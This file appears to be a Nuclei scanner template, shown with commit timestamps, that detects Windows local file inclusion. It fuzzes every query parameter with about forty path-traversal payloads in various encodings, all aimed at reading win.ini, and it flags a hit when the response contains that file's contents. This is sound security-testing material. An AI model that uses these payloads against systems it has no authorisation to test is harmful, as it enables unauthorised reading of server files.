nuclei-templates/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml

77 lines
3.9 KiB
YAML
Raw Normal View History

2024-03-16 18:44:49 +00:00
id: windows-lfi-fuzz
info:
name: Local File Inclusion - Windows
author: pussycat0x
severity: high
metadata:
max-request: 39
2024-03-23 09:32:51 +00:00
tags: lfi,windows,dast
2024-03-16 18:44:49 +00:00
http:
2024-03-31 19:55:42 +00:00
- pre-condition:
2024-03-26 07:21:56 +00:00
- type: dsl
dsl:
- 'method == "GET"'
2024-03-16 18:44:49 +00:00
payloads:
win_fuzz:
low:
- '\WINDOWS\win.ini'
- '../../windows/win.ini'
- '....//....//windows/win.ini'
- '../../../../../windows/win.ini'
- '/..///////..////..//////windows/win.ini'
- '/../../../../../../../../../windows/win.ini'
- './../../../../../../../../../../windows/win.ini'
- '..%2f..%2f..%2f..%2fwindows/win.ini'
medium:
- '\WINDOWS\win.ini%00'
- '\WINNT\win.ini'
- '\WINNT\win.ini%00'
- 'windows/win.ini%00'
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
high:
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
2024-03-16 18:44:49 +00:00
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{win_fuzz}}'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2024-09-05 07:57:04 +00:00
# digest: 490a00463044022001665ad128e1e9817134df585972f60d8bebd7740e0472013db313a9d9bb1e99022074ea253f7af516b025cb6d752a251558bc95f751db1ef738df529bc478dda8af:922c64590222798bb761d5b6d8e72950